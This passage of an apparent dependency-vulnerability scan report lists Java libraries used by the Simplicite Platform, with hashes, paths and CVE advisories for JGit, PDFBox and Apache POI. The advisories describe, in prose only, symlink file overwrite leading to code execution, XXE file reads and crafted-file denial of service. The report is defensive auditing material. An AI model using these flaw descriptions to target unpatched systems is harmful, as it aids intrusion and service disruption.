Product | pom | name | Apache Oltu - OAuth 2.0 - Client | High
Product | pom | parent-artifactid | org.apache.oltu.oauth2.parent | Medium
Version | file | version | 1.0.2 | High
Version | Manifest | Bundle-Version | 1.0.2 | High
Version | pom | version | 1.0.2 | Highest
org.apache.oltu.oauth2.common-1.0.2.jar
Description: OAuth 2.0 library - Common
License: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /var/simplicite/.m2/repository/org/apache/oltu/oauth2/org.apache.oltu.oauth2.common/1.0.2/org.apache.oltu.oauth2.common-1.0.2.jar
MD5: 48d5e8f17d2f292b32788d2b98b1aebd
SHA1: a82fff95276f4c6feadc7993670e659076e43260
SHA256: 5e7ce01db88b361543e75644269c9447a059a5fecc23a15f3546eff8680ec968
Referenced In Project/Scope: Simplicite Platform:compile
Evidence:
Type | Source | Name | Value | Confidence
Vendor | file | name | org.apache.oltu.oauth2.common | High
Vendor | jar | package name | apache | Highest
Vendor | jar | package name | common | Highest
Vendor | jar | package name | oauth2 | Highest
Vendor | jar | package name | oltu | Highest
Vendor | Manifest | bundle-docurl | https://oltu.apache.org/org.apache.oltu.oauth2.parent/org.apache.oltu.oauth2.common/ | Low
Vendor | Manifest | bundle-symbolicname | org.apache.oltu.oauth2.common | Medium
Vendor | Manifest | implementation-build | tags/org.apache.oltu.oauth2.parent-1.0.2/common@r1740515 | Low
Vendor | Manifest | implementation-build-date | 2016-04-22 13:07:39+0000 | Low
Vendor | pom | artifactid | apache.oltu.oauth2.common | Low
Vendor | pom | artifactid | org.apache.oltu.oauth2.common | Highest
Vendor | pom | groupid | org.apache.oltu.oauth2 | Highest
Vendor | pom | name | Apache Oltu - OAuth 2.0 - Common | High
Vendor | pom | parent-artifactid | org.apache.oltu.oauth2.parent | Low
Product | file | name | org.apache.oltu.oauth2.common | High
Product | jar | package name | apache | Highest
Product | jar | package name | common | Highest
Product | jar | package name | oauth2 | Highest
Product | jar | package name | oltu | Highest
Product | Manifest | bundle-docurl | https://oltu.apache.org/org.apache.oltu.oauth2.parent/org.apache.oltu.oauth2.common/ | Low
Product | Manifest | Bundle-Name | Apache Oltu - OAuth 2.0 - Common | Medium
Product | Manifest | bundle-symbolicname | org.apache.oltu.oauth2.common | Medium
Product | Manifest | implementation-build | tags/org.apache.oltu.oauth2.parent-1.0.2/common@r1740515 | Low
Product | Manifest | implementation-build-date | 2016-04-22 13:07:39+0000 | Low
Product | pom | artifactid | apache.oltu.oauth2.common | Highest
Product | pom | artifactid | org.apache.oltu.oauth2.common | Highest
Product | pom | groupid | org.apache.oltu.oauth2 | Highest
Product | pom | name | Apache Oltu - OAuth 2.0 - Common | High
Product | pom | parent-artifactid | org.apache.oltu.oauth2.parent | Medium
Version | file | version | 1.0.2 | High
Version | Manifest | Bundle-Version | 1.0.2 | High
Version | pom | version | 1.0.2 | Highest
org.eclipse.jgit.http.server-5.5.0.201909110433-r.jar
Description: Git aware HTTP server implementation.
File Path: /var/simplicite/.m2/repository/org/eclipse/jgit/org.eclipse.jgit.http.server/5.5.0.201909110433-r/org.eclipse.jgit.http.server-5.5.0.201909110433-r.jar
MD5: ec48075bfa53e1ca3c6975ac4bfd2b0b
SHA1: df2a73da47d2b38fc90bd941adda8d2f69d5653b
SHA256: 446fbfacb5dcea6c93218ba59a720fe66510a730cc409aac1384282ecb47199b
Referenced In Project/Scope: Simplicite Platform:compile
Evidence:
Type | Source | Name | Value | Confidence
Vendor | file | name | org.eclipse.jgit.http.server | High
Vendor | jar | package name | eclipse | Highest
Vendor | jar | package name | http | Highest
Vendor | jar | package name | jgit | Highest
Vendor | jar | package name | server | Highest
Vendor | Manifest | automatic-module-name | org.eclipse.jgit.http.server | Medium
Vendor | Manifest | build-jdk-spec | 1.8 | Low
Vendor | Manifest | bundle-activationpolicy | lazy | Low
Vendor | Manifest | bundle-localization | plugin | Low
Vendor | Manifest | bundle-requiredexecutionenvironment | JavaSE-1.8 | Low
Vendor | Manifest | bundle-symbolicname | org.eclipse.jgit.http.server | Medium
Vendor | Manifest | Implementation-Vendor | Eclipse.org - JGit | High
Vendor | Manifest | Implementation-Vendor-Id | org.eclipse.jgit | Medium
Vendor | Manifest | implementation-vendor-url | http://www.eclipse.org/jgit/ | Medium
Vendor | pom | artifactid | eclipse.jgit.http.server | Low
Vendor | pom | artifactid | org.eclipse.jgit.http.server | Highest
Vendor | pom | groupid | org.eclipse.jgit | Highest
Vendor | pom | name | JGit - HTTP Server | High
Vendor | pom | parent-artifactid | org.eclipse.jgit-parent | Low
Product | file | name | org.eclipse.jgit.http.server | High
Product | jar | package name | eclipse | Highest
Product | jar | package name | http | Highest
Product | jar | package name | jgit | Highest
Product | jar | package name | server | Highest
Product | Manifest | automatic-module-name | org.eclipse.jgit.http.server | Medium
Product | Manifest | build-jdk-spec | 1.8 | Low
Product | Manifest | bundle-activationpolicy | lazy | Low
Product | Manifest | bundle-localization | plugin | Low
Product | Manifest | Bundle-Name | %Bundle-Name | Medium
Product | Manifest | bundle-requiredexecutionenvironment | JavaSE-1.8 | Low
Product | Manifest | bundle-symbolicname | org.eclipse.jgit.http.server | Medium
Product | Manifest | Implementation-Title | JGit org.eclipse.jgit.http.server | High
Product | pom | artifactid | eclipse.jgit.http.server | Highest
Product | pom | artifactid | org.eclipse.jgit.http.server | Highest
Product | pom | groupid | org.eclipse.jgit | Highest
Product | pom | name | JGit - HTTP Server | High
Product | pom | parent-artifactid | org.eclipse.jgit-parent | Medium
Version | Manifest | Bundle-Version | 5.5.0.201909110433-r | High
Version | Manifest | Implementation-Version | 5.5.0.201909110433-r | High
Version | pom | version | 5.5.0.201909110433-r | Highest
Related Dependencies:
org.eclipse.jgit-5.5.0.201909110433-r.jar
File Path: /var/simplicite/.m2/repository/org/eclipse/jgit/org.eclipse.jgit/5.5.0.201909110433-r/org.eclipse.jgit-5.5.0.201909110433-r.jar
MD5: 9a063e363be577add8094f325283924e
SHA1: 75c27f087134757a8ac335e637c117d68d41c773
SHA256: d5b2cd6284744abbc63ccc10f4c2039a6bc010e9d697c26999f30c4705e5fdcf
Package URL: pkg:maven/org.eclipse.jgit/org.eclipse.jgit@5.5.0.201909110433-r

CVE-2023-4759
Arbitrary File Overwrite in Eclipse JGit <= 6.6.0
In Eclipse JGit, all versions <= 6.6.0.202305301015-r, a symbolic link present in a specially crafted git repository can be used to write a file to locations outside the working tree when this repository is cloned with JGit to a case-insensitive filesystem, or when a checkout from a clone of such a repository is performed on a case-insensitive filesystem.
This can happen on checkout (DirCacheCheckout), merge (ResolveMerger via its WorkingTreeUpdater), pull (PullCommand using merge), and when applying a patch (PatchApplier). This can be exploited for remote code execution (RCE), for instance if the file written outside the working tree is a git filter that gets executed on a subsequent git command.
The issue occurs only on case-insensitive filesystems, like the default filesystems on Windows and macOS. The user performing the clone or checkout must have the rights to create symbolic links for the problem to occur, and symbolic links must be enabled in the git configuration.
Setting git configuration option core.symlinks = false before checking out avoids the problem.
The issue was fixed in Eclipse JGit version 6.6.1.202309021850-r and 6.7.0.202309050840-r, available via Maven Central (https://repo1.maven.org/maven2/org/eclipse/jgit/) and repo.eclipse.org (https://repo.eclipse.org/content/repositories/jgit-releases/). A backport is available in 5.13.3 starting from 5.13.3.202401111512-r.
The JGit maintainers would like to thank RyotaK for finding and reporting this issue.
CWE-59 Improper Link Resolution Before File Access ('Link Following'), CWE-178 Improper Handling of Case Sensitivity
CVSSv3: HIGH (8.8), vector CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
org.eclipse.paho.client.mqttv3-1.2.1.jar
File Path: /var/simplicite/.m2/repository/org/eclipse/paho/org.eclipse.paho.client.mqttv3/1.2.1/org.eclipse.paho.client.mqttv3-1.2.1.jar
MD5: 94e4b9eac1b077dd6157a71994256f8d
SHA1: 0a0932397520960d23566d1d9d09075f28bc8164
SHA256: 56e4708abf2e051028f2cd0b206c8d04ec83f272ee30d543a074738269dfeaac
Referenced In Project/Scope: Simplicite Platform:compile
Evidence:
Type | Source | Name | Value | Confidence
Vendor | file | name | org.eclipse.paho.client.mqttv3 | High
Vendor | jar | package name | client | Highest
Vendor | jar | package name | eclipse | Highest
Vendor | jar | package name | mqttv3 | Highest
Vendor | jar | package name | paho | Highest
Vendor | Manifest | bundle-activationpolicy | lazy | Low
Vendor | Manifest | bundle-localization | bundle | Low
Vendor | Manifest | bundle-requiredexecutionenvironment | JavaSE-1.7 | Low
Vendor | Manifest | bundle-symbolicname | org.eclipse.paho.client.mqttv3 | Medium
Vendor | pom | artifactid | eclipse.paho.client.mqttv3 | Low
Vendor | pom | artifactid | org.eclipse.paho.client.mqttv3 | Highest
Vendor | pom | groupid | org.eclipse.paho | Highest
Vendor | pom | parent-artifactid | java-parent | Low
Product | file | name | org.eclipse.paho.client.mqttv3 | High
Product | jar | package name | client | Highest
Product | jar | package name | eclipse | Highest
Product | jar | package name | mqttv3 | Highest
Product | jar | package name | paho | Highest
Product | Manifest | bundle-activationpolicy | lazy | Low
Product | Manifest | bundle-localization | bundle | Low
Product | Manifest | Bundle-Name | %bundle.name | Medium
Product | Manifest | bundle-requiredexecutionenvironment | JavaSE-1.7 | Low
Product | Manifest | bundle-symbolicname | org.eclipse.paho.client.mqttv3 | Medium
Product | pom | artifactid | eclipse.paho.client.mqttv3 | Highest
Product | pom | artifactid | org.eclipse.paho.client.mqttv3 | Highest
Product | pom | groupid | org.eclipse.paho | Highest
Product | pom | parent-artifactid | java-parent | Medium
Version | file | version | 1.2.1 | High
Version | Manifest | Bundle-Version | 1.2.1 | High
Version | pom | version | 1.2.1 | Highest
parso-2.0.11.jar
Description: Parso is a lightweight Java library designed to read SAS7BDAT datasets. The Parso interfaces are analogous to libraries designed to read table-storing files, for example, CSVReader library. Despite its small size, the Parso library is the only full-featured open-source solution to process SAS7BDAT datasets, both uncompressed, CHAR-compressed and BIN-compressed. It is effective in processing clinical and statistical data often stored in SAS7BDAT format. Parso allows converting data into CSV format.
License: Apache License v2: http://www.apache.org/licenses/LICENSE-2.0.html
File Path: /var/simplicite/.m2/repository/com/epam/parso/2.0.11/parso-2.0.11.jar
MD5: 5600fb69b3bb3ca4c0270941fa80bf10
SHA1: 3cd3dde9ace470e102bb344e05467ce308108a8e
SHA256: c3042420664fccf8634f77d99bd75e1d2ec03af985e1bf9f1c7a9f4cc79c8fe8
Referenced In Project/Scope: Simplicite Platform:compile
Evidence:
Type | Source | Name | Value | Confidence
Vendor | file | name | parso | High
Vendor | jar | package name | epam | Highest
Vendor | jar | package name | epam | Low
Vendor | jar | package name | impl | Low
Vendor | jar | package name | parso | Highest
Vendor | jar | package name | parso | Low
Vendor | pom | artifactid | parso | Highest
Vendor | pom | artifactid | parso | Low
Vendor | pom | developer email | arat90@ya.ru | Low
Vendor | pom | developer email | Igor_Printsev@epam.com | Low
Vendor | pom | developer name | Igor Printsev | Medium
Vendor | pom | developer name | Petr Tsurinov | Medium
Vendor | pom | developer org | EPAM | Medium
Vendor | pom | developer org URL | http://www.epam.com | Medium
Vendor | pom | groupid | com.epam | Highest
Vendor | pom | name | parso | High
Vendor | pom | url | epam/parso | Highest
Product | file | name | parso | High
Product | jar | package name | epam | Highest
Product | jar | package name | impl | Low
Product | jar | package name | parso | Highest
Product | jar | package name | parso | Low
Product | pom | artifactid | parso | Highest
Product | pom | developer email | arat90@ya.ru | Low
Product | pom | developer email | Igor_Printsev@epam.com | Low
Product | pom | developer name | Igor Printsev | Low
Product | pom | developer name | Petr Tsurinov | Low
Product | pom | developer org | EPAM | Low
Product | pom | developer org URL | http://www.epam.com | Low
Product | pom | groupid | com.epam | Highest
Product | pom | name | parso | High
Product | pom | url | epam/parso | High
Version | file | version | 2.0.11 | High
Version | pom | version | 2.0.11 | Highest
pdfbox-2.0.16.jar
Description: The Apache PDFBox library is an open source Java tool for working with PDF documents.
License: https://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /var/simplicite/.m2/repository/org/apache/pdfbox/pdfbox/2.0.16/pdfbox-2.0.16.jar
MD5: 0f1782f92a3c66df7d821ab251f2cb89
SHA1: 5dce5e41fc472d02800df5ef060a1f3a58c36902
SHA256: f53d8e869042296703f6753a6dc48e4823d45b7fc1e9c30bf7d20907f0180068
Referenced In Project/Scope: Simplicite Platform:compile
Evidence:
Type | Source | Name | Value | Confidence
Vendor | file | name | pdfbox | High
Vendor | jar | package name | apache | Highest
Vendor | jar | package name | pdfbox | Highest
Vendor | Manifest | bundle-docurl | http://pdfbox.apache.org | Low
Vendor | Manifest | bundle-symbolicname | org.apache.pdfbox | Medium
Vendor | Manifest | Implementation-Vendor | The Apache Software Foundation | High
Vendor | Manifest | Implementation-Vendor-Id | org.apache.pdfbox | Medium
Vendor | Manifest | require-capability | osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.6))" | Low
Vendor | Manifest | specification-vendor | The Apache Software Foundation | Low
Vendor | pom | artifactid | pdfbox | Highest
Vendor | pom | artifactid | pdfbox | Low
Vendor | pom | groupid | org.apache.pdfbox | Highest
Vendor | pom | name | Apache PDFBox | High
Vendor | pom | parent-artifactid | pdfbox-parent | Low
Product | file | name | pdfbox | High
Product | jar | package name | apache | Highest
Product | jar | package name | filter | Highest
Product | jar | package name | pdfbox | Highest
Product | jar | package name | version | Highest
Product | Manifest | bundle-docurl | http://pdfbox.apache.org | Low
Product | Manifest | Bundle-Name | Apache PDFBox | Medium
Product | Manifest | bundle-symbolicname | org.apache.pdfbox | Medium
Product | Manifest | Implementation-Title | Apache PDFBox | High
Product | Manifest | require-capability | osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.6))" | Low
Product | Manifest | specification-title | Apache PDFBox | Medium
Product | pom | artifactid | pdfbox | Highest
Product | pom | groupid | org.apache.pdfbox | Highest
Product | pom | name | Apache PDFBox | High
Product | pom | parent-artifactid | pdfbox-parent | Medium
Version | file | version | 2.0.16 | High
Version | Manifest | Bundle-Version | 2.0.16 | High
Version | Manifest | Implementation-Version | 2.0.16 | High
Version | pom | version | 2.0.16 | Highest
Related Dependencies:
pdfbox-debugger-2.0.16.jar
File Path: /var/simplicite/.m2/repository/org/apache/pdfbox/pdfbox-debugger/2.0.16/pdfbox-debugger-2.0.16.jar
MD5: a93191c73fcc4d27ef62e94bd095ebad
SHA1: c7ce7c9898559bc8a2e1224b08f36d6e3f31e245
SHA256: fa2d359ecce141fb74986f1bfcc91e0fdc8bb36388f4c37aa2f0c60bfe1f889b
Package URL: pkg:maven/org.apache.pdfbox/pdfbox-debugger@2.0.16
pdfbox-tools-2.0.16.jar
File Path: /var/simplicite/.m2/repository/org/apache/pdfbox/pdfbox-tools/2.0.16/pdfbox-tools-2.0.16.jar
MD5: ade022f4ede7f37ff82d182c5b9bfaaa
SHA1: ef25df47cf8e3776db0ca1007616573e2061295b
SHA256: ab192bd897c94e3759603ca1de8d7e82b03552a824b0c02a22af3bc3b83476c8
Package URL: pkg:maven/org.apache.pdfbox/pdfbox-tools@2.0.16

CVE-2021-27807
A carefully crafted PDF file can trigger an infinite loop while loading the file. This issue affects Apache PDFBox version 2.0.22 and prior 2.0.x versions.
CWE-834 Excessive Iteration
CVSSv2: MEDIUM (4.3), vector /AV:N/AC:M/Au:N/C:N/I:N/A:P
CVSSv3: MEDIUM (5.5), vector CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

CVE-2021-27906
A carefully crafted PDF file can trigger an OutOfMemory-Exception while loading the file. This issue affects Apache PDFBox version 2.0.22 and prior 2.0.x versions.
NVD-CWE-Other
CVSSv2: MEDIUM (4.3), vector /AV:N/AC:M/Au:N/C:N/I:N/A:P
CVSSv3: MEDIUM (5.5), vector CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

CVE-2021-31811
In Apache PDFBox, a carefully crafted PDF file can trigger an OutOfMemory-Exception while loading the file. This issue affects Apache PDFBox version 2.0.23 and prior 2.0.x versions.
CWE-770 Allocation of Resources Without Limits or Throttling
CVSSv2: MEDIUM (4.3), vector /AV:N/AC:M/Au:N/C:N/I:N/A:P
CVSSv3: MEDIUM (5.5), vector CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

CVE-2021-31812
In Apache PDFBox, a carefully crafted PDF file can trigger an infinite loop while loading the file. This issue affects Apache PDFBox version 2.0.23 and prior 2.0.x versions.
CWE-835 Loop with Unreachable Exit Condition ('Infinite Loop')
CVSSv2: MEDIUM (4.3), vector /AV:N/AC:M/Au:N/C:N/I:N/A:P
CVSSv3: MEDIUM (5.5), vector CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H
perfmark-api-0.17.0.jar
Description: PerfMark API
License: Apache 2.0: https://opensource.org/licenses/Apache-2.0
File Path: /var/simplicite/.m2/repository/io/perfmark/perfmark-api/0.17.0/perfmark-api-0.17.0.jar
MD5: 1c8d1c8e70fd55114f1c31c28da7a813
SHA1: 97e81005e3a7f537366ffdf20e11e050303b58c1
SHA256: 816c11409b8a0c6c9ce1cda14bed526e7b4da0e772da67c5b7b88eefd41520f9
Referenced In Project/Scope: Simplicite Platform:compile
Evidence:
Type | Source | Name | Value | Confidence
Vendor | file | name | perfmark-api | High
Vendor | jar | package name | io | Highest
Vendor | jar | package name | io | Low
Vendor | jar | package name | perfmark | Highest
Vendor | jar | package name | perfmark | Low
Vendor | pom | artifactid | perfmark-api | Highest
Vendor | pom | artifactid | perfmark-api | Low
Vendor | pom | developer email | carl@carlmastrangelo.com | Low
Vendor | pom | developer id | carl-mastrangelo | Medium
Vendor | pom | developer name | Carl Mastrangelo | Medium
Vendor | pom | groupid | io.perfmark | Highest
Vendor | pom | name | perfmark:perfmark-api | High
Vendor | pom | url | perfmark/perfmark | Highest
Product | file | name | perfmark-api | High
Product | jar | package name | io | Highest
Product | jar | package name | perfmark | Highest
Product | jar | package name | perfmark | Low
Product | pom | artifactid | perfmark-api | Highest
Product | pom | developer email | carl@carlmastrangelo.com | Low
Product | pom | developer id | carl-mastrangelo | Low
Product | pom | developer name | Carl Mastrangelo | Low
Product | pom | groupid | io.perfmark | Highest
Product | pom | name | perfmark:perfmark-api | High
Product | pom | url | perfmark/perfmark | High
Version | file | version | 0.17.0 | High
Version | pom | version | 0.17.0 | Highest
poi-4.1.0.jar
Description: Apache POI - Java API To Access Microsoft Format Files
License: The Apache Software License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /var/simplicite/.m2/repository/org/apache/poi/poi/4.1.0/poi-4.1.0.jar
MD5: 2d38a6074de57cf93d86e7c5b988c31d
SHA1: 66ea82c8e7cd87e9ae8bceca45daf01328c8d623
SHA256: 0d578177f2bde41aa2b68dbac743186208b7a00ccef3c767d5f3271bed2731bf
Referenced In Project/Scope: Simplicite Platform:compile
Evidence:
Type | Source | Name | Value | Confidence
Vendor | file | name | poi | High
Vendor | jar | package name | apache | Highest
Vendor | jar | package name | format | Highest
Vendor | jar | package name | poi | Highest
Vendor | Manifest | Implementation-Vendor | The Apache Software Foundation | High
Vendor | Manifest | Implementation-Vendor-Id | org.apache.poi | Medium
Vendor | Manifest | specification-vendor | The Apache Software Foundation | Low
Vendor | pom | artifactid | poi | Highest
Vendor | pom | artifactid | poi | Low
Vendor | pom | groupid | org.apache.poi | Highest
Vendor | pom | name | Apache POI | High
Vendor | pom | organization name | Apache Software Foundation | High
Vendor | pom | organization url | http://www.apache.org/ | Medium
Vendor | pom | url | http://poi.apache.org/ | Highest
Product | file | name | poi | High
Product | jar | package name | apache | Highest
Product | jar | package name | format | Highest
Product | jar | package name | poi | Highest
Product | Manifest | Implementation-Title | Apache POI | High
Product | Manifest | specification-title | Apache POI | Medium
Product | pom | artifactid | poi | Highest
Product | pom | groupid | org.apache.poi | Highest
Product | pom | name | Apache POI | High
Product | pom | organization name | Apache Software Foundation | Low
Product | pom | organization url | http://www.apache.org/ | Low
Product | pom | url | http://poi.apache.org/ | Medium
Version | file | version | 4.1.0 | High
Version | Manifest | Implementation-Version | 4.1.0 | High
Version | pom | version | 4.1.0 | Highest
Related Dependencies:
poi-ooxml-4.1.0.jar
File Path: /var/simplicite/.m2/repository/org/apache/poi/poi-ooxml/4.1.0/poi-ooxml-4.1.0.jar
MD5: fd6f7aa27923816712a39ecb8123a86f
SHA1: 42d7913de1a6360058e8d14bb7769a33633a639b
SHA256: 6efc47195a2af7db6331ef94338d2fab8a405dde7df89a164292935d70f91ec9
Package URL: pkg:maven/org.apache.poi/poi-ooxml@4.1.0
poi-ooxml-schemas-4.1.0.jar
File Path: /var/simplicite/.m2/repository/org/apache/poi/poi-ooxml-schemas/4.1.0/poi-ooxml-schemas-4.1.0.jar
MD5: ebc100eb62204029b5595666bb6cc157
SHA1: 06a2a0dfa19db33f4fba5b0a0261bb517a86cb56
SHA256: f31a38cf88e3c94ed3b6a73fddccac372b8d355163721bdef8c579a81eba002b
Package URL: pkg:maven/org.apache.poi/poi-ooxml-schemas@4.1.0
poi-scratchpad-4.1.0.jar
File Path: /var/simplicite/.m2/repository/org/apache/poi/poi-scratchpad/4.1.0/poi-scratchpad-4.1.0.jar
MD5: ff9f0033d89142377ae3af7874890f9e
SHA1: a000ba60895a7aede6ebd5bb7f7d8d1c8f9ac735
SHA256: 9b88117286be44a69919a44aac44e6166628e69b742ec806269fbd814b2393e8
Package URL: pkg:maven/org.apache.poi/poi-scratchpad@4.1.0

CVE-2019-12415
In Apache POI up to 4.1.0, when using the tool XSSFExportToXml to convert user-provided Microsoft Excel documents, a specially crafted document can allow an attacker to read files from the local filesystem or from internal network resources via XML External Entity (XXE) Processing.
CWE-611 Improper Restriction of XML External Entity Reference ('XXE')
CVSSv2: LOW (2.1), vector /AV:L/AC:L/Au:N/C:P/I:N/A:N
CVSSv3: MEDIUM (5.5), vector CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

CVE-2022-26336
A shortcoming in the HMEF package of poi-scratchpad (Apache POI) allows an attacker to cause an Out of Memory exception. This package is used to read TNEF files (Microsoft Outlook and Microsoft Exchange Server). If an application uses poi-scratchpad to parse TNEF files and the application allows untrusted users to supply them, then a carefully crafted file can cause an Out of Memory exception. This issue affects poi-scratchpad version 5.2.0 and prior versions. Users are recommended to upgrade to poi-scratchpad 5.2.1.
CWE-20 Improper Input Validation, CWE-770 Allocation of Resources Without Limits or Throttling
CVSSv2: MEDIUM (4.3), vector /AV:N/AC:M/Au:N/C:N/I:N/A:P
CVSSv3: MEDIUM (5.5), vector CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H
postgresql-42.6.0.jarDescription:
PostgreSQL JDBC Driver Postgresql License:
BSD-2-Clause: https://jdbc.postgresql.org/about/license.html File Path: /var/simplicite/.m2/repository/org/postgresql/postgresql/42.6.0/postgresql-42.6.0.jar
MD5: 527f2c51d65f6a78d6548c51a35556aa
SHA1: 7614cfce466145b84972781ab0079b8dea49e363
SHA256: b817c67a40c94249fd59d4e686e3327ed0d3d3fae426b20da0f1e75652cfc461
Referenced In Project/Scope: Simplicite Platform:runtime
Evidence Type Source Name Value Confidence Vendor file name postgresql High Vendor jar package name driver Highest Vendor jar package name jdbc Highest Vendor jar package name postgresql Highest Vendor Manifest automatic-module-name org.postgresql.jdbc Medium Vendor Manifest bundle-copyright Copyright (c) 2003-2020, PostgreSQL Global Development Group Low Vendor Manifest bundle-docurl https://jdbc.postgresql.org/ Low Vendor Manifest bundle-symbolicname org.postgresql.jdbc Medium Vendor Manifest Implementation-Vendor PostgreSQL Global Development Group High Vendor Manifest Implementation-Vendor-Id org.postgresql Medium Vendor Manifest provide-capability osgi.service;effective:=active;objectClass="org.osgi.service.jdbc.DataSourceFactory";osgi.jdbc.driver.class="org.postgresql.Driver";osgi.jdbc.driver.name="PostgreSQL JDBC Driver" Low Vendor Manifest require-capability osgi.ee;filter:="(&(|(osgi.ee=J2SE)(osgi.ee=JavaSE))(version>=1.8))" Low Vendor Manifest specification-vendor Oracle Corporation Low Vendor pom artifactid postgresql Highest Vendor pom artifactid postgresql Low Vendor pom developer id bokken Medium Vendor pom developer id davecramer Medium Vendor pom developer id jurka Medium Vendor pom developer id oliver Medium Vendor pom developer id ringerc Medium Vendor pom developer id vlsi Medium Vendor pom developer name Brett Okken Medium Vendor pom developer name Craig Ringer Medium Vendor pom developer name Dave Cramer Medium Vendor pom developer name Kris Jurka Medium Vendor pom developer name Oliver Jowett Medium Vendor pom developer name Vladimir Sitnikov Medium Vendor pom groupid org.postgresql Highest Vendor pom name PostgreSQL JDBC Driver High Vendor pom organization name PostgreSQL Global Development Group High Vendor pom organization url https://jdbc.postgresql.org/ Medium Vendor pom url https://jdbc.postgresql.org Highest Product file name postgresql High Product hint analyzer product pgjdbc Highest Product hint analyzer product postgresql_jdbc_driver Highest Product jar package name driver Highest Product jar package name jdbc Highest Product jar package name osgi Highest Product jar package name postgresql Highest Product jar package name version Highest Product Manifest automatic-module-name org.postgresql.jdbc Medium Product Manifest bundle-copyright Copyright (c) 2003-2020, PostgreSQL Global Development Group Low Product Manifest bundle-docurl https://jdbc.postgresql.org/ Low Product Manifest Bundle-Name PostgreSQL JDBC Driver Medium Product Manifest bundle-symbolicname org.postgresql.jdbc Medium Product Manifest Implementation-Title PostgreSQL JDBC Driver High Product Manifest provide-capability osgi.service;effective:=active;objectClass="org.osgi.service.jdbc.DataSourceFactory";osgi.jdbc.driver.class="org.postgresql.Driver";osgi.jdbc.driver.name="PostgreSQL JDBC Driver" Low Product Manifest require-capability osgi.ee;filter:="(&(|(osgi.ee=J2SE)(osgi.ee=JavaSE))(version>=1.8))" Low Product Manifest specification-title JDBC Medium Product pom artifactid postgresql Highest Product pom developer id bokken Low Product pom developer id davecramer Low Product pom developer id jurka Low Product pom developer id oliver Low Product pom developer id ringerc Low Product pom developer id vlsi Low Product pom developer name Brett Okken Low Product pom developer name Craig Ringer Low Product pom developer name Dave Cramer Low Product pom developer name Kris Jurka Low Product pom developer name Oliver Jowett Low Product pom developer name Vladimir Sitnikov Low Product pom groupid org.postgresql Highest Product pom name PostgreSQL JDBC Driver High Product pom organization name PostgreSQL Global Development Group Low Product pom organization url https://jdbc.postgresql.org/ Low Product pom url https://jdbc.postgresql.org Medium Version file version 42.6.0 High Version Manifest Bundle-Version 42.6.0 High Version Manifest Implementation-Version 42.6.0 High Version pom version 42.6.0 Highest
proto-google-cloud-firestore-admin-v1-1.9.0.jar
Description: PROTO library for proto-google-cloud-firestore-admin-v1
File Path: /var/simplicite/.m2/repository/com/google/api/grpc/proto-google-cloud-firestore-admin-v1/1.9.0/proto-google-cloud-firestore-admin-v1-1.9.0.jar
MD5: b0efde7002174970fc09abb0c4ae19b2
SHA1: 0503a6729169653c152a8dc86913bd74f82de7da
SHA256: 5d54251efc740f0beb9d7144d18d8b6a2dc7f8052fbbbda50ce917ad9c4b27a1
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name proto-google-cloud-firestore-admin-v1 High Vendor jar package name admin Highest Vendor jar package name admin Low Vendor jar package name firestore Highest Vendor jar package name firestore Low Vendor jar package name google Highest Vendor jar package name google Low Vendor jar package name v1 Highest Vendor pom artifactid proto-google-cloud-firestore-admin-v1 Highest Vendor pom artifactid proto-google-cloud-firestore-admin-v1 Low Vendor pom groupid com.google.api.grpc Highest Vendor pom name proto-google-cloud-firestore-admin-v1 High Vendor pom parent-artifactid google-api-grpc Low Product file name proto-google-cloud-firestore-admin-v1 High Product jar package name admin Highest Product jar package name admin Low Product jar package name firestore Highest Product jar package name firestore Low Product jar package name google Highest Product jar package name v1 Highest Product jar package name v1 Low Product pom artifactid proto-google-cloud-firestore-admin-v1 Highest Product pom groupid com.google.api.grpc Highest Product pom name proto-google-cloud-firestore-admin-v1 High Product pom parent-artifactid google-api-grpc Medium Version file version 1.9.0 High Version pom parent-version 1.9.0 Low Version pom version 1.9.0 Highest
proto-google-cloud-firestore-v1-1.9.0.jar
Description: PROTO library for proto-google-cloud-firestore-v1
File Path: /var/simplicite/.m2/repository/com/google/api/grpc/proto-google-cloud-firestore-v1/1.9.0/proto-google-cloud-firestore-v1-1.9.0.jar
MD5: f8890ed41d3dec67526185af8e9bff7e
SHA1: f7010c387aefaf022df0a9550bee4f20229d6aaa
SHA256: 8dbc7a5046ad60d38d4d375fe1aa4e27c6a2550fe3c09bf1d3eaf1d2d1d0272d
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name proto-google-cloud-firestore-v1 High Vendor jar package name firestore Highest Vendor jar package name firestore Low Vendor jar package name google Highest Vendor jar package name google Low Vendor jar package name v1 Highest Vendor jar package name v1 Low Vendor pom artifactid proto-google-cloud-firestore-v1 Highest Vendor pom artifactid proto-google-cloud-firestore-v1 Low Vendor pom groupid com.google.api.grpc Highest Vendor pom name proto-google-cloud-firestore-v1 High Vendor pom parent-artifactid google-api-grpc Low Product file name proto-google-cloud-firestore-v1 High Product jar package name firestore Highest Product jar package name firestore Low Product jar package name google Highest Product jar package name v1 Highest Product jar package name v1 Low Product pom artifactid proto-google-cloud-firestore-v1 Highest Product pom groupid com.google.api.grpc Highest Product pom name proto-google-cloud-firestore-v1 High Product pom parent-artifactid google-api-grpc Medium Version file version 1.9.0 High Version pom parent-version 1.9.0 Low Version pom version 1.9.0 Highest
proto-google-cloud-firestore-v1beta1-0.62.0.jar
Description: PROTO library for proto-google-cloud-firestore-v1beta1
File Path: /var/simplicite/.m2/repository/com/google/api/grpc/proto-google-cloud-firestore-v1beta1/0.62.0/proto-google-cloud-firestore-v1beta1-0.62.0.jar
MD5: 93266d7f21e7849f00b07743d8546f79
